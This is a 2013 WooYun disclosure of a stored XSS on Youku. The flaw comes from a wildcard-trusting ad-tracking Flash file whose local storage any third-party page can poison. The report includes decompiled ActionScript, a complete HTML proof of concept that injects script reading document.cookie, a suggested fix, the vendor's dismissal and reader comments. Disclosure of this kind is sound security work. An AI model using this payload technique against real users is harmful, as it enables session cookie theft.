当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-039670

漏洞标题:优酷分站一个存储型XSS漏洞

相关厂商:优酷

漏洞作者: neobyte

提交时间:2013-10-14 11:29

修复时间:2013-10-19 11:30

公开时间:2013-10-19 11:30

漏洞类型:xss跨站脚本攻击

危害等级:中

自评Rank:10

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-10-14: 细节已通知厂商并且等待厂商处理中
2013-10-19: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

优酷主站一个存储XSS

详细说明:

在访问youku,查看任意带广告的视频时,都会去调用一个MTFlashStore.swf的回调函数jGetItem.
看看这个jGetItem的实现代码:

public function init(){
var ret:* = null;
Security.allowDomain("*");
Security.allowInsecureDomain("*");
var params:* = root.loaderInfo.parameters;
this.jsProxyFunction = params.jsproxyfunction;
try {
this.so = SharedObject.getLocal("mt_adtracker", "/");
} catch(e) {
sendJSError("创建FSO失败,可能用户禁用了Flash本地存储!");
};
......
ExternalInterface.addCallback("jGetItem", function (_arg1, _arg2):void{
ExternalInterface.call(jsProxyFunction, "onecall", _arg2, so.data[_arg1]);
});
......


该Flash未进行Security.allowDomain的限制. 那么任意第三方都可以修改LSO中的数据,而LSO->用户存储->ExternalInterface.call,就导致存储XSS.
访问下面的POC代码,再观看任意带广告的Youku视频,例如:
http://v.youku.com/v_show/id_XNjIwNDI2NDI0.html?f=20383529&ev=1
就会触发XSS.

<html>
<body>
<object id="MTFlashStore" tabindex="-1" classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" width="1" height="1" codebase="http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab">
<param name="movie" value="http://irs01.net/MTFlashStore.swf">
<param name="allowScriptAccess" value="always">
<param name="flashvars" value="jsproxyfunction=test">
<embed name="MTFlashStore" src="http://irs01.net/MTFlashStore.swf" width="1" height="1" allowscriptaccess="always" flashvars="jsproxyfunction=test" type="application/x-shockwave-flash" pluginspage="http://www.adobe.com/go/getflashplayer">
</object>
<script>
function test(cmd,data){
if(cmd=="load"){
var ua = navigator.userAgent.toLowerCase();
if(ua.match(/msie ([\d.]+)/))document['MTFlashStore'].jSetItem('_iwt_id','\\")));}catch(e){alert(document.cookie);}//','0');
else document['MTFlashStore'].jSetItem('_iwt_id','\\"));alert(document.cookie);}catch(e){}//','0');
}
if(cmd=="onecall"){
alert('ok');
}
if(cmd=="error"){
alert(data);
}
}
</script>
</body>
</html>


注:经过baidu, 了解到这个irs01.net可能是来自艾瑞(iResearch,互联网数据分析),但因为优酷受到影响,故报告到优酷(抱歉打扰了,:-))

漏洞证明:

1. chrome下

youkuchrome.png


2.IE下,顺便看看域名

youkuie.png

修复方案:

建议对来自LSO中的数据进行检查.或者严格限制Security.allowDomain
注意:这里不能简单地修补jGetItem为读取并返回LSO,而不调用ExternalInterface.call, 那样同样会导致XSS.

版权声明:转载请注明来源 neobyte@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2013-10-19 11:30

厂商回复:

最新状态:

暂无


漏洞评价:

评论

  1. 2013-10-14 12:16 | MeirLin ( 实习白帽子 | Rank:96 漏洞数:30 | 号借人)

    是搜库那个么 = =?

  2. 2013-10-14 13:00 | neobyte ( 普通白帽子 | Rank:117 漏洞数:11 )

    @MeirLin 不是,观看视频触发的

  3. 2013-10-14 13:52 | MeirLin ( 实习白帽子 | Rank:96 漏洞数:30 | 号借人)

    @neobyte 那就坐等忽略了

  4. 2013-10-14 17:56 | J′aron ( 路人 | Rank:17 漏洞数:5 | 问题真实存在但是影响不大.)

    危害等级:无影响厂商忽略

  5. 2014-09-12 13:04 | neobyte ( 普通白帽子 | Rank:117 漏洞数:11 )

    终于平反了。。。二哥的演讲很精彩!

  6. 2014-09-14 00:37 | 大亮 ( 普通白帽子 | Rank:306 漏洞数:65 | 慢慢挖洞)

    二哥用这个漏洞攻击了整个视频网络的xss。。。

  7. 2014-09-15 14:02 | Jam ( 路人 | Rank:3 漏洞数:1 | I'm CJ!)

    搞不懂为什么是「无影响厂商忽略」。。。

  8. 2014-11-14 23:00 | 鬼五 ( 普通白帽子 | Rank:214 漏洞数:83 )

    大牛哥哥球带

  9. 2014-12-12 21:40 | 迦南 ( 路人 | Rank:14 漏洞数:11 | 我不是玩黑,我就是认真)

    看了二哥的ppt,前来跪拜